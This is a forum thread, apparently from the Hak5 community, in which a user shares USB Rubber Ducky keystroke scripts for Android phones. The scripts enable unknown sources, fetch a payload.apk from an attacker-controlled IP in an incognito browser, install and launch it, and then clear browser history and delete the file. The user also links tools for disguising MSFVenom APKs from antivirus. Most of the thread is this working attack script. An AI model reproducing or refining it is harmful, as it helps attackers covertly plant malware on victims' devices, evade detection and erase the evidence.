n33dsh3llz Posted February 25, 2017 Share Posted February 25, 2017 Hello Hak5 Community, Trying to figure out how to download a .apk file, then execute it. I know how to download it, which may be enough. Ideally, the whole process could be 100% automated. Maybe I could just sleep the script giving the user time to launch manually if there is no hotkeys. I tried opening the downloads inside the browser, but couldn't find a way to select the rows of downloaded files (maybe a security feature). Also, when bringing down the main bar and going to the downloaded file, then launching, it never opened the app other than seeing the AV scan take place. Note: WINDOWS+N brings down top slider bar & F10 opens downloads in Chrome.. documents said CNTL+J opened downloads, but it wasn't working for me. Can't figure out a way to open the downloaded .apk file. Here is what I have so far. Keep in mind delays have not been put in yet and this is merely a run-down through using a keyboard: #Allow unknown sources ESCAPE #(x whatever for main screen) WINDOWS+N UP ENTER DOWN ARROW x 6 ENTER DOWN ARROW x 7 ENTER RIGHT ARROW ENTER ESCAPE #(x whatever to get to main screen) #Begin the download and install of the payload WINDOWS+B #Brings up the browser CNTL+SHIFT+N #Open incognito window (if not chrome, shouldnt do anything) CNTL+L #Access the URL bar String http://x.x.x.x:xxxx/payload.apk #types in the file to download ENTER ** FIGURE OUT WAY TO LAUNCH IT ** TAB TAB #Places you at INSTALL ENTER SLEEP X #Give to install TAB TAB ENTER #Launch Recent scripts I wrote to bypass Android AV: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector For this attack, apkwash would be perfect as it would simply mask the small .apk file generated by MSFVenom. Smaller=faster downloading. Maybe a twin-duck for this would work better to install from local media. Quote Link to comment Share on other sites More sharing options...
n33dsh3llz Posted February 25, 2017 Author Share Posted February 25, 2017 (edited) Ended up finishing the unknown sources setting, but figured it is a waste of time as it can be easily bypassed once attempting to install. https://github.com/jbreed/usb-ducky-android-download Here is what I think will work best as there is so many issues that can arise. Potential issues: -Default browser not set to chrome. ALT d is to get the URL line for "Internet" app. May add this just to make it fail-safe. -Default browser not set at all. This will simply require pressing the button to relaunch the script as it should have been set with the first run. What would take place after: Install the apk (bypass untrusted sources, select 'open') Clear browsing history if default app wasn't chrome Delete the downloaded .apk file (if launched with Chrome, then the script below will take you to the screen afterwards) DELAY 200 REM ----- BACK OUT TO MAIN MENU ----- ESCAPE ESCAPE REM ----- OPEN BROWSER ------ GUI b DELAY 1000 REM ----- Select url bar and navigate ----- CTRL l ALT d DELAY 200 STRING example.com DELAY 250 ENTER DELAY 250 REM ----- DOWNLOAD HAS BEGAN ----- REM ----- TIME TO INSTALL MANUALLY ----- REM ----- FOR CHROME, CLEARING HISTORY AND OPENING DOWNLOADS ----- CTRL h DELAY 300 TAB TAB TAB DELAY 10 ENTER DELAY 100 F10 DELAY 300 DOWN DOWN DOWN DOWN DOWN DOWN ENTER Edited February 25, 2017 by n33dsh3llz updated Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.